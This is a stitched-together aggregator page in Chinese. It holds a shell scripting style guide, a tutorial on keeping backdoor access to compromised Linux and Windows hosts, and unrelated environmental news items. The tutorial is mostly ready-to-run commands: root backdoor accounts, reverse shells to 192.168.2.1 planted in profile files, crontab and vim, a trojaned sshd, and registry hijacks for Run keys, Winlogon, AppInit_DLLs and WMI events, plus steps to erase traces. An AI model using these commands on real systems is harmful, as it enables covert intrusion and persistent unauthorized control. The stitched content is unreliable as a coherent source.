• ver：1.0
• 博客：https://www.cnblogs.com/Rohn
• 本文介紹了Shell編程的一些語法規範，主要參考依據為谷歌的Shell語法風格。

目錄

• 背景
  • 使用哪一種Shell
  • 什麼時候使用Shell
• 註釋
  • 頂層註釋
  • 功能註釋
  • TODO註釋
• 格式
  • 縮進
  • 行的長度和長字符串
  • 管道
  • 循環
    • if-else語句
    • for-do和while-do語句
  • case語句
  • 變量擴展
• 特性
  • 命令替換
  • 文件名的通配符擴展
• 命名約定
  • 函數名
  • 變量名
  • 常量和環境變量名
  • 源文件名
  • 只讀變量
  • 使用本地變量
• 調用命令
  • 檢查返回值

背景

博客：https://www.cnblogs.com/Rohn

使用哪一種Shell

可執行文件必須以 #!/bin/bash 和最小數量的標誌開始。請使用 set 來設置shell的選項，使得用 <script_name>調用你的腳本時不會破壞其功能。

推薦使用：

#!/usr/bin/env bash

env一般固定在/usr/bin目錄下，而其餘解釋器的安裝位置就相對不那麼固定。

限制所有的可執行Shell腳本為bash使得我們安裝在所有計算機中的shell語言保持一致性。

無論你是為什麼而編碼，對此唯一例外的是當你被迫時可以不這麼做的。其中一個例子是Solaris SVR4包，編寫任何腳本都需要用純Bourne shell。

[root@test ~]# echo $SHELL
/bin/bash

什麼時候使用Shell

使用Shell需要遵守的一些準則：

• 如果你主要是在調用其他的工具並且做一些相對很小數據量的操作，那麼使用Shell來完成任務是一種可接受的選擇。
• 如果你在乎性能，那麼請選擇其他工具，而不是使用Shell。
• 如果你發現你需要使用數據而不是變量賦值（如 ${PHPESTATUS} ），那麼你應該使用Python腳本。
• 如果你將要編寫的腳本會超過100行，那麼你可能應該使用Python來編寫，而不是Shell。

請記住，當腳本行數增加，儘早使用另外一種語言重寫你的腳本，以避免之後花更多的時間來重寫。

註釋

博客：https://www.cnblogs.com/Rohn

Bash只支持單行註釋，使用#開頭的都被當作註釋語句。

頂層註釋

每個文件必須包含一個頂層註釋，對其內容進行簡要概述。版權聲明和作者信息是可選的。
例如：

#!/usr/bin/env bash
# Author: Rohn
# Version: 1.0
# Created Time: 2020/06/06
# Perform hot backups of MySQL databases.

• 第1行，指明解釋器，使用bash

#!叫做”Shebang”或者”Sha-bang”(Unix術語中，#號通常稱為sharp，hash或mesh；而!則常常稱為bang)，指明了執行這個腳本文件的解釋程序。當然，如果使用bash test.sh這樣的命令來執行腳本，那麼#!這一行將會被忽略掉。

• 第2-5行，分別為作者、版本號、創建時間、功能說明。

功能註釋

任何不是既明顯又短的函數都必須被註釋。任何庫函數無論其長短和複雜性都必須被註釋。

其他人通過閱讀註釋（和幫助信息，如果有的話）就能夠學會如何使用你的程序或庫函數，而不需要閱讀代碼。

所有的函數註釋應該包含：

• 函數的描述
• 全局變量的使用和修改
• 使用的參數說明
• 返回值，而不是上一條命令運行后默認的退出狀態

例如：

#!/usr/bin/env bash
# Author: Rohn
# Version: 1.0
# Created Time: 2020/06/06
# Perform hot backups of Oracle databases.

export PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin'

#######################################
# Cleanup files from the backup dir
# Globals:
#   BACKUP_DIR
#   ORACLE_SID
# Arguments:
#   None
# Returns:
#   None
#######################################
cleanup() {
  ...
}

TODO註釋

TODOs應該包含全部大寫的字符串TODO，接着是括號中你的用戶名。冒號是可選的。最好在TODO條目之後加上bug或者ticket的序號。

例如：

# TODO(mrmonkey): Handle the unlikely edge cases (bug ####)

格式

博客：https://www.cnblogs.com/Rohn

縮進

縮進兩個空格，沒有製表符。例如：

if [ a > 1 ];then
  echo '${a} > 1'
fi

行的長度和長字符串

行的最大長度為80個字符。例如：

# DO use 'here document's
cat <<END;
I am an exceptionally long
string.
END

# Embedded newlines are ok too
long_string="I am an exceptionally
  long string."

管道

如果一行容不下整個管道操作，那麼請將整個管道操作分割成每行一個管段。

應該將整個管道操作分割成每行一個管段，管道操作的下一部分應該將管道符放在新行並且縮進2個空格。這適用於使用管道符|的合併命令鏈以及使用||和&&的邏輯運算鏈。

例如：

# All fits on one line
command1 | command2

# Long commands
command1 \
  | command2 \
  | command3 \
  | command4

循環

if-else語句

if和; then放在同一行，;后空一格，else單獨一行，fi單獨一行，並與if垂直對齊。即：

if condition; then
  statement(s)
else
  statement(s)
fi

for-do和while-do語句

while/for和; do放在同一行，done與while/for垂直對齊，即：

# while structure
while condition; do
  statement(s)
done

# for structure
for condition; do
  statement(s)
done

例如：

for dir in ${dirs_to_cleanup}; do
  if [[ -d "${dir}/${ORACLE_SID}" ]]; then
    log_date "Cleaning up old files in ${dir}/${ORACLE_SID}"
    rm "${dir}/${ORACLE_SID}/"*
    if [[ "$?" -ne 0 ]]; then
      error_message
    fi
  else
    mkdir -p "${dir}/${ORACLE_SID}"
    if [[ "$?" -ne 0 ]]; then
      error_message
    fi
  fi
done

case語句

• 通過2個空格縮進可選項。
• 在同一行可選項的模式右圓括號之後和結束符 ;;之前各需要一個空格。
• 長可選項或者多命令可選項應該被拆分成多行，模式、操作和結束符;;在不同的行。

匹配表達式比case和esac 縮進一級。多行操作要再縮進一級。一般情況下，不需要引用匹配表達式。模式表達式前面不應該出現左括號。避免使用;&和;;&符號。即：

# case structure
case in expression in
  pattern1)
    statement1
    ;;
  pattern2)
    statement2
    ;;
  ...
  *)
    statementn
    ;;
esac

例如：

case "${expression}" in
  a)
    variable="..."
    some_command "${variable}" "${other_expr}" ...
    ;;
  absolute)
    actions="relative"
    another_command "${actions}" "${other_expr}" ...
    ;;
  *)
    error "Unexpected expression '${expression}'"
    ;;
esac

只要整個表達式可讀，簡單的命令可以跟模式和;; 寫在同一行。這通常適用於單字母選項的處理。當單行容不下操作時，請將模式單獨放一行，然後是操作，最後結束符;; 也單獨一行。當操作在同一行時，模式的右括號之後和結束符;;之前請使用一個空格分隔。

verbose='false'
aflag=''
bflag=''
files=''
while getopts 'abf:v' flag; do
  case "${flag}" in
    a) aflag='true' ;;
    b) bflag='true' ;;
    f) files="${OPTARG}" ;;
    v) verbose='true' ;;
    *) error "Unexpected option ${flag}" ;;
  esac
done

變量擴展

按優先級順序：保持跟你所發現的一致；引用你的變量；推薦用${var}而不是$var 。

例如

# Section of recommended cases.

# Preferred style for 'special' variables:
echo "Positional: $1" "$5" "$3"
echo "Specials: !=$!, -=$-, _=$_. ?=$?, #=$# *=$* @=$@ \$=$$ ..."

# Braces necessary:
echo "many parameters: ${10}"

# Braces avoiding confusion:
# Output is "a0b0c0"
set -- a b c
echo "${1}0${2}0${3}0"

# Preferred style for other variables:
echo "PATH=${PATH}, PWD=${PWD}, mine=${some_var}"
while read f; do
  echo "file=${f}"
done < <(ls -l /tmp)

# Section of discouraged cases

# Unquoted vars, unbraced vars, brace-quoted single letter
# shell specials.
echo a=$avar "b=$bvar" "PID=${$}" "${1}"

# Confusing use: this is expanded as "${1}0${2}0${3}0",
# not "${10}${20}${30}
set -- a b c
echo "$10$20$30"

特性

博客：https://www.cnblogs.com/Rohn

命令替換

使用 $(command)而不是反引號。

嵌套的反引號要求用反斜杠轉義內部的反引號。而$(command) 形式嵌套時不需要改變，而且更易於閱讀。

例如：

# This is preferred:
var="$(command "$(command1)")"

# This is not:
var="`command \`command1\``"

文件名的通配符擴展

當進行文件名的通配符擴展時，請使用明確的路徑。

因為文件名可能以-開頭，所以使用擴展通配符./*比*來得安全得多。

# Here's the contents of the directory:
# -f  -r  somedir  somefile

# This deletes almost everything in the directory by force
psa@bilby$ rm -v *
removed directory: `somedir'
removed `somefile'

# As opposed to:
psa@bilby$ rm -v ./*
removed `./-f'
removed `./-r'
rm: cannot remove `./somedir': Is a directory
removed `./somefile'

命名約定

博客：https://www.cnblogs.com/Rohn

函數名

使用小寫字母，並用下劃線分隔單詞。使用雙冒號 :: 分隔庫。函數名之後必須有圓括號。關鍵詞 function 是可選的，但必須在一個項目中保持一致。

如果你正在寫單個函數，請用小寫字母來命名，並用下劃線分隔單詞。如果你正在寫一個包，使用雙冒號 :: 來分隔包名。大括號必須和函數名位於同一行（就像在Google的其他語言一樣），並且函數名和圓括號之間沒有空格。

# Single function
my_func() {
  ...
}

# Part of a package
mypackage::my_func() {
  ...
}

當函數名后存在 () 時，關鍵詞 function 是多餘的。但是其促進了函數的快速辨識。

變量名

使用小寫字母，循環的變量名應該和循環的任何變量同樣命名。例如：

for zone in ${zones}; do
  something_with "${zone}"
done

常量和環境變量名

全部使用大寫字母，用下劃線分隔，聲明在文件的頂部。例如：

# Constant
readonly PATH_TO_FILES='/some/path'

# Both constant and environment
declare -xr ORACLE_SID='PROD'

源文件名

使用小寫字母，如果需要的話使用下劃線分隔單詞。例如： maketemplate 或者 make_template ，而不是 make-template 。

只讀變量

使用小寫字母，使用 readonly 或者 declare -r 來確保變量只讀。

因為全局變量在Shell中廣泛使用，所以在使用它們的過程中捕獲錯誤是很重要的。當你聲明了一個變量，希望其只讀，那麼請明確指出。

zip_version="$(dpkg --status zip | grep Version: | cut -d ' ' -f 2)"
if [[ -z "${zip_version}" ]]; then
  error_message
else
  readonly zip_version
fi

使用本地變量

使用小寫字母，使用 local 聲明特定功能的變量。聲明和賦值應該在不同行。

使用 local 來聲明局部變量以確保其只在函數內部和子函數中可見。這避免了污染全局命名空間和不經意間設置可能具有函數之外重要性的變量。

當賦值的值由命令替換提供時，聲明和賦值必須分開。因為內建的 local 不會從命令替換中傳遞退出碼。

my_func2() {
  local name="$1"

  # Separate lines for declaration and assignment:
  local my_var
  my_var="$(my_func)" || return

  # DO NOT do this: $? contains the exit code of 'local', not my_func
  local my_var="$(my_func)"
  [[ $? -eq 0 ]] || return

  ...
}

調用命令

博客：https://www.cnblogs.com/Rohn

檢查返回值

對於非管道命令，使用$?或直接通過一個if語句來檢查以保持其簡潔。例如：

if ! mv "${file_list}" "${dest_dir}/" ; then
  echo "Unable to move ${file_list} to ${dest_dir}" >&2
  exit "${E_BAD_MOVE}"
fi

# Or
mv "${file_list}" "${dest_dir}/"
if [[ "$?" -ne 0 ]]; then
  echo "Unable to move ${file_list} to ${dest_dir}" >&2
  exit "${E_BAD_MOVE}"
fi

Bash也有 PIPESTATUS 變量，允許檢查從管道所有部分返回的代碼。如果僅僅需要檢查整個管道是成功還是失敗，以下的方法是可以接受的：

tar -cf - ./* | ( cd "${dir}" && tar -xf - )
if [[ "${PIPESTATUS[0]}" -ne 0 || "${PIPESTATUS[1]}" -ne 0 ]]; then
  echo "Unable to tar files to ${dir}" >&2
fi

可是，只要你運行任何其他命令， PIPESTATUS 將會被覆蓋。如果你需要基於管道中發生的錯誤執行不同的操作，那麼你需要在運行命令后立即將 PIPESTATUS 賦值給另一個變量（別忘了 [ 是一個會將 PIPESTATUS 擦除的命令）。

tar -cf - ./* | ( cd "${DIR}" && tar -xf - )
return_codes=(${PIPESTATUS[*]})
if [[ "${return_codes[0]}" -ne 0 ]]; then
  do_something
fi
if [[ "${return_codes[1]}" -ne 0 ]]; then
  do_something_else
fi

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※別再煩惱如何寫文案,掌握八大原則!

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※超省錢租車方案

※教你寫出一流的銷售文案?

※網頁設計最專業,超強功能平台可客製化

※產品缺大量曝光嗎?你需要的是一流包裝設計!

linux權限維持

添加賬號

一般在具有root權限時可以使用以下2種方式添加root權限用戶

1.通過useradd，後面賬號backdoor/123456

useradd -u 0 -o -g root -G root backdoor

echo 123456:password|chpasswd

2.通過直接對etc/passwd文件進行寫入

perl -e 'print crypt("123456", "AA"). "\n"' #首先用perl算一下123456加密后的結果

# 123456加密后的結果為AASwmzPNx.3sg

echo "backdoor:123456:0:0:me:/root:/bin/bash">>/etc/passwd	#直接寫入etc/passwd中

清理以上痕迹

userdel -f backdoor

設置sid位的文件

在具有高權限時，將高權限的bash文件拷貝隱藏起來，設置其suid位，則可後面通過低權限用戶獲取高權限操作

在高權限時

cp /bin/bash /tmp/.bash

chmod 4755 /tmp/.bash  #設置suid

使用時帶上-p參數

/tmp/.bash -p

清理痕迹

rm -rf /tmp/.bash

通過環境變量植入後門

以下是環境變量的位置

/etc/profile
/etc/profile.d/*.sh
~/.bash_profile
~/.profile
~/.bashrc
~/bash_logout
/etc/bashrc
/etc/bash.bashrc

寫入shell反彈語句

echo 'bash -i >& /dev/tcp/192.168.2.1/7777 0>&1' >> /etc/profile

這樣在重啟的時候就會彈shell過來了,會根據登的哪個賬號彈哪個賬號的shell

以下文件需要高權限，為全局變量

/etc/profile
/etc/profile.d/*.sh
/etc/bashrc
/etc/bash.bashrc

以下為當前用戶的環境變量

~/.bash_profile		#實驗過程中沒有反應
~/.profile				#登錄後會接收shell，但是加載桌面時會卡住
~/.bashrc					#打開shell窗口時會接收shell，但正常的shell窗口會卡住
~/bash_logout			#實驗過程中沒有反應

清理痕迹

刪除配置文件中添加的代碼即可

寫入ssh公鑰

首先在本地生成ssh公鑰和私鑰

在自己的~/.ssh/目錄下執行

ssh-keygen -t rsa

會生成以下三個文件，id_rsa.pub為公鑰，id_rsa為私鑰

id_rsa      id_rsa.pub  known_hosts

xxx為公鑰內容，也就是id_rsa.pub的內容

echo "xxx" >> ~/.ssh/authorized_keys

清理痕迹

刪除目標上的 ~/.ssh/authorized_keys即可

ssh任意密碼登錄

在root用戶時，su，chfn，chsh命令不需要輸入密碼認證

通過軟連接將ssh的服務進行cp，並重命名為以上命令

ln -sf /usr/sbin/sshd /tmp/su				#將sshd做軟連接，軟連接文件名為su或chfn或chsh
/tmp/su -oPort=12345								#通過軟連接的文件，開啟ssh連接-oPort指定開啟端口

連接

ssh root@host -p 12345

#密碼隨便輸入即可登錄,並且可登錄任意賬號

清理方式

netstat -antp | gerp -E "su|chfn|chsh"
#找到進程號xxx
ps aux | grep xxx
#找到軟連接位置/aaa/bbb/su
kill xxx
rm -rf /aaa/bbb/su

修改sshd文件做到無認證登錄

建立連接時ssh服務器端使用的是sshd文件來管理接收到的連接，此時對sshd文件內容進行修改，則能做到無認證登錄

將原先的sshd文件進行轉義

mv /usr/sbin/sshd /usr/bin/sshd

開始使用perl進行寫腳本

echo '#!/usr/bin/perl' > /usr/sbin/sshd
echo 'exec "/bin/bash -i" if (getpeername(STDIN) =~ /^..LF/);' >> /usr/sbin/sshd
echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >> /usr/sbin/sshd

其實整個腳本在第二行執行了個if，如果端口符合要求，則直接建立連接，否則正常執行sshd

其中的LF代表開啟的端口號是19526

python2
>> import struct
>> print struct.pack('>I6',19526) 
#輸出的內容為 LF

賦予新文件權限並重啟sshd

chmod u+x sshd
service sshd restart

連接方式

socat STDIO TCP4:172.16.177.178:22,bind=:19526

清除痕迹

#刪除自定義的sshd
rm -rf /usr/sbin/sshd
#將同版本的sshd拷貝到對應目錄下
mv /usr/bin/sshd /usr/sbin/sshd

利用vim可執行python腳本預留後門

先準備個python的反彈shell腳本

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.1",7778));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

找到提供vim插件的python的擴展包目錄

vim --version  #查看使用的python版本

找到python的擴展位置

pip show requests

進入目錄

cd /usr/lib/python2.7/site-packages

將內容寫入

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.1",7778));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > dir.py

運行，並刪除文件

$(nohup vim -E -c "pyfile dir.py"> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py

清除痕迹

ps aux|grep vim
#獲取pid
kill pid

計劃任務

因為計劃任務使用的是/bin/sh,所以傳統的直接通過bash反彈shell是行不通的

這裏藉助python，或者perl都可

使用python

echo -e "*/1 * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.2.1\",7778));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"|crontab -

使用perl

echo -e "*/1 * * * * perl -e 'use Socket;\$i=\"192.168.2.1\";\$p=7778;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"|crontab -

清除痕迹

如果通過crontab -e 不知道為啥會頂掉上一個

crontab -l			#只看得到一個
crontab -r			#刪除所有計劃任務

動態加載庫

使用export LD_PRELOAD=./xx.so

這時候./xx.so中如果對函數進行了重定義，調用了該函數的程序就會執行重定義的代碼

這裏使用以下項目

https://github.com/Screetsec/Vegile

準備2個文件

• msf的木馬
• Veglie項目

使用方法將MSF木馬和Vegile上傳到目標服務器上，把項目目錄弄成http服務

python -m SimpleHTTP

目標服務器上

wget http://xxx.xxx.xx.xxx:8000/Vegile.zip
wget http://xxx.xxx.xx.xxx:8000/shell

解壓后運行

unzip Vegile.zip
chmod 777 Vegile shell
./Vegile --u shell

清理痕迹

清理起來十分麻煩，因為直接刪除進程是刪不掉的，因此存在父進程與多個子進程

清理思路掛起父進程，清除所有子進程再刪除父進程

windows權限維持

比較常見的windows提取

ms14_058 內核模式驅動程序中的漏洞可能允許遠程執行代碼
ms16_016 WebDAV本地提權漏洞(CVE-2016-0051)
ms16_032 MS16-032 Secondary Logon Handle 本地提權漏漏洞

計劃任務

拿到shell后先修改編碼

chcp 65001

設置計劃任務，每分鐘調用運行一次shell

schtasks /create /tn shell /tr C:\payload.exe /sc minute /mo 1 /st 10:30:30 /et 10:50:00

清理痕迹

控制面板->管理工具->任務計劃程序->找到惡意計劃任務
在 操作 中找到調用的腳本，進行文件刪除
刪除惡意計劃任務

映像劫持

在程序運行前會去讀自己是否設置了debug，需要對劫持的程序有權限

以下通過註冊表對setch.exe設置了debug為cmd.exe程序，也就是按5下shift會彈出cmd的框

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

清理痕迹

HKLM是HKEY_LOCAL_MACHINE

找到目標的註冊表，將debug內容刪除

環境變量

用戶登陸時會去加載環境變量，通過設置環境變量UserInitMprLogonScript值，實現登陸時自動運行腳本

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\Users\Public\Downloads\1.bat" /f

清理痕迹

直接找到 開始->用戶頭像->更改我的環境變量

進程退出劫持

在註冊表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit下控製程序的退出時執行的動作,但有時候權限很迷

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d "c:\payload.exe”

清理痕迹

找到目標的註冊表刪除即可

AppInit_DLLs注入

User32.dll 被加載到進程時，設置其註冊表的中能設置加載其他的dll文件，則可使其加載惡意的腳本

對HKML註冊表的內容進行修改一般都要system權限

Windows 10

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Users\Public\Downloads\beacon.dll" /f

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f

其他

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Users\Public\Downloads\beacon.dll" /f

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0x0 /f

這樣在打開cmd或者計算器這種能調用User32.dll動態鏈接庫的時候就會觸發

清理痕迹

到對應註冊表的位置刪除Appinit_Dlls的值

bits文件傳輸

通過bitsadmin從網絡上下載的時候可以額外執行腳本

bitsadmin /create test

隨意下載
bitsadmin /addfile test http://192.168.2.1:8000/payload.ps1 c:\users\public\downloads\payload.ps1 

執行的命令
bitsadmin /SetNotifyCmdLine test "C:\windows\system32\cmd.exe" "cmd.exe /c c:\users\public\downloads\payload.exe" 

啟動任務
bitsadmin /resume test

每次開機的時候會觸發

清理痕迹

bitsadmin /reset

COM組件劫持

將腳本放入com組件中

reg add "HKEY_CURRENT_USER\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" /t REG_SZ /d "c:\users\public\downloads\beacon.dll" /f

reg add "HKEY_CURRENT_USER\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" /v ThreadingModel /t REG_SZ /d "Apartment" /f

清理痕迹

刪除註冊表中的路徑值，並通過路徑刪除木馬文件

替換cmd.exe

將sethc.exe（按shift 5下）替換成cmd.exe

takeown /f sethc.* /a /r /d y
cacls sethc.exe /T /E /G administrators:F
copy /y cmd.exe sethc.exe

清理痕迹

找個原版的setch.exe 覆蓋回去

Winlogon劫持

winlogon是windows登錄賬戶時會執行的程序，這裏將其註冊表中寫入木馬運行的dll路徑

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v shell /t REG_SZ /d "explorer.exe, rundll32.exe \"c:\users\public\downloads\beacon.dll\" StartW" /f

清理痕迹

刪除註冊表的shell中的值，並且找到後門文件刪除掉

組策略

需要能遠程登錄到桌面

輸入gpedit.msc打開組策略，需要管理員賬號

在用戶與計算機中的windows設置中均可以對腳本進行編輯，用戶策略是用戶權限，計算機策略是system權限

清理痕迹

打開組策略找到腳本，刪除即可

修改計算器啟動服務調用的程序

啟動服務有些需要手動啟動，比如IEEtwCollectorService 服務，這裏做後面的思路是，該服務本身對計算機運行沒有影響，因此將其手動啟動改成自動啟動，並將其運行的腳本改成木馬後門

類比一下windows10 沒有IEEtwCollectorService 服務可以選擇COMSysApp服務

篡改運行腳本
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\IEEtwCollector Service" /v ImagePath /t REG_EXPAND_SZ /d "c:\users\public\downloads\beacon.exe" /f

設置自動啟動
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\IEEtwCollector Service" /v Start /t REG_DWORD /d 2 /f 

啟動服務
sc start IEEtwCollectorService 

返回的是system權限

清理痕迹

將篡改的註冊表改回來，並且刪除目標木馬

MSDTC 服務

MSDTC 服務默認會加載一個在windowss/system32下的不存在的 oci.dll，思路是將cs.dll 改名為oci.dll，放到system32下即可，該方法需要管理員用戶權限

清理痕迹

刪除的時候因為被多個進程調用，因此刪不掉，這裏可以換個思路修改其名稱，重啟再刪除

啟動項

啟動項是會去指定文件夾下運行文件夾下的所有服務，這個文件夾是

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

也會運行以下註冊表中的腳本

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "c:\users\public\downloads\payload.exe" /f

需要高權限
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "c:\users\public\downloads\payload.exe" /f

清理痕迹

刪除文件夾下的木馬或者刪除註冊表中添加的惡意木馬註冊表，並找到木馬位置刪除

cmd 啟動劫持

在cmd啟動時回去註冊表中查看是否有AutoRun的健值，如果有則會運行其中的腳本

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "c:\users\public\downloads\payload.exe" /f

清理痕迹

在管理員權限下刪除註冊表的值即可

wmic事件

註冊一個事件過濾器，該過濾器是開機 2 分鐘到 2 分半鍾，由於是永久 WMI 事 件訂閱，故需要管理員權限，最終獲取到權限也是 system 權限
wmic 
/NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150" 


註冊一個事件消費者，這裏寫入了要執行的命令，是用 rundll32 啟動 cs 的 dll
wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\users\public\downloads\beacon.dll #5" 

綁定事件 過濾器和事件消費者
wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※超省錢租車方案

※別再煩惱如何寫文案,掌握八大原則!

※回頭車貨運收費標準

※教你寫出一流的銷售文案?

※產品缺大量曝光嗎?你需要的是一流包裝設計!

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

摘錄自2020年9月17日ETtoday報導

一群旅客在泰國考艾國家公園（Khao Yai National Park）露營後，沒有將垃圾妥善處理，反而將它們全都留在營地四周，為其他露營者造成困擾，也破壞環境生態。自然資源與環境部長沃拉兀（Varawut Silpa-archa）想出了新辦法，將這些垃圾寄還原主人，並依《國家公園法》提出訴訟。

據《Thai PBS World》報導，沃拉兀這週以來在他的臉書粉專發文，警告在公園露營的遊客在離開營地前，一定要將自己的垃圾清理乾淨。他指出，若旅客未將垃圾妥善處理，管理員將把它們都收集起來，郵寄給原主人。

沃拉兀提醒，隨意丟棄垃圾將導致野生動物在無意間吃下塑膠袋而死，不止弄髒公園，還破壞環境生態，是極度不可取的。他表示，這些亂丟垃圾的旅客將因違反泰國的《國家公園法》而面對長達5年監禁和高達50萬泰銖（約新台幣40萬元）的罰款，而違反公園規則者將被罰款10萬泰銖（約新台幣9萬元）。

污染治理
國際新聞
泰國
露營
亂丟垃圾

本站聲明:網站內容來源環境資訊中心https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※自行創業缺乏曝光? 網頁設計幫您第一時間規劃公司的形象門面

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※想知道最厲害的網頁設計公司"嚨底家"!

※別再煩惱如何寫文案,掌握八大原則!

※產品缺大量曝光嗎?你需要的是一流包裝設計!

摘錄自2020年09月19日中央通訊社美國報導

美國疫情未退，加州又陷野火災情，空氣品質不佳，美國疾病管制暨預防中心（CDC）專家今天（19日）警告，煙塵可能刺激肺部，造成發炎，削弱免疫系統，使人更易感染新型冠狀病毒。

媒體報導，煙塵的覆蓋範圍大，加州不少醫院的急診或門診，氣喘患者增加。醫生擔心，2019冠狀病毒疾病（COVID-19，武漢肺炎）加上即將到來的流感季節，還有野火煙塵產生的呼吸疾病患者，會占用一定程度的醫療資源。

一名肺部專科醫生說，即使短時間暴露在煙霧中，也會降低人體對抗感染的能力。過去幾週隨著野火災情擴大，因呼吸問題就醫的患者大量增加。煙霧當中的微粒會使人體內的呼吸道黏膜變乾、發炎，使身體難以抵抗傳染來源。野火讓空氣變乾，體內呼吸道的黏液減少，呼吸道與黏膜會發炎、腫脹，對任何外來的病原更沒有抵抗力。

污染治理
國際新聞
加州
美國
野火
武漢肺炎
空氣污染

本站聲明:網站內容來源環境資訊中心https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※別再煩惱如何寫文案,掌握八大原則!

※教你寫出一流的銷售文案?

※超省錢租車方案

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※產品缺大量曝光嗎?你需要的是一流包裝設計!

摘錄自2020年09月19日蘋果日報美國報導

新冠肺炎（武漢肺炎）疫情未見趨緩，美國部分地區又傳出現罕見的蚊媒傳染病，且已造成數人死亡。《CNN》報導，密西根州衛生與公共服務部（MDHHS）15日宣布，該州西南部又確認4起民眾感染「東部馬腦炎」（EEE，Eastern Equine Encephalitis）病例，其中2人已經死亡，目前密西根州已有7明確診案例，其中3人死亡。

東部馬腦炎是一種以蚊子作為媒介的人畜共通傳染病，雖然罕見，但卻可能致死。CDC去年接獲的通報病例與死亡人數就已出現了不尋常的增加，達到38例。

密西根州10個郡的22匹馬，也被驗出感染了EEE，是去年此時通報動物感染數量的兩倍，當局正在多個高風險地區礤取空中行動滅蚊，以降低傳播病毒媒介的蚊子數量。

 

生物多樣性
國際新聞
蚊子
CDC
人畜共通傳染病

本站聲明:網站內容來源環境資訊中心https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※別再煩惱如何寫文案,掌握八大原則!

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※超省錢租車方案

※教你寫出一流的銷售文案?

※網頁設計最專業,超強功能平台可客製化

※產品缺大量曝光嗎?你需要的是一流包裝設計!

環境資訊中心綜合外電；姜唯 編譯；林大利 審校

本站聲明:網站內容來源環境資訊中心https://e-info.org.tw/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

